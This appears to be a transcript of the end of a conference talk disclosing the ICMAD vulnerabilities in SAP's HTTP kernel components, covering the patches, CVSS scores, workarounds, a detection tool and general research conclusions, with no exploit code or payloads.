Okay, so SAP released two patches for all their systems. They must be applied on any system running SAP, because the fix is part of the SAP kernel. There are two CVEs: the first vulnerability received a CVSS score of 10; the second one, the use-after-free, received 8.1. In that case they said that the complexity of the attack is high and the scope is unchanged. We disagree, but that's how they saw it. It's also important to note that this can be used against any SAP system in the world. There are also some workarounds that can be implemented in NetWeaver and Web Dispatcher, and we provided a tool that can be used to detect the attack.

So, finally, some conclusions. We saw that HTTP servers are really interesting targets, and this is because we can reverse engineer them with the RFC in mind: we know the HTTP server must follow the RFC, so it's easier to understand what it is doing. They also have similar functionalities, and we can use the requests and responses, locating them in memory, to know what we can modify and what we cannot. We also saw many talks presenting different attacks, like the one presented yesterday by Orange against IIS. Again, attacks on HTTP servers are increasing, so it's really important to understand them and keep looking for new vulnerabilities. It was also interesting to demonstrate that we can escalate low-level vulnerabilities with HTTP exploitation techniques, and this includes the new techniques called client-side desynchronization; we can also use DNS rebinding to bypass some VPNs and leverage attacks that in the past could not be exploited. And finally, I want to say that ICMAD, the code name of these vulnerabilities, was flagged by the Cybersecurity and Infrastructure Security Agency (CISA) of the US.
All these vulnerabilities had a critical impact, because the vulnerable components were exposed to the internet and present in all SAP installations. SAP stated that these were among the worst vulnerabilities they have ever fixed, and this is also because we found them in a really exposed service, which is HTTP and HTTPS. Questions?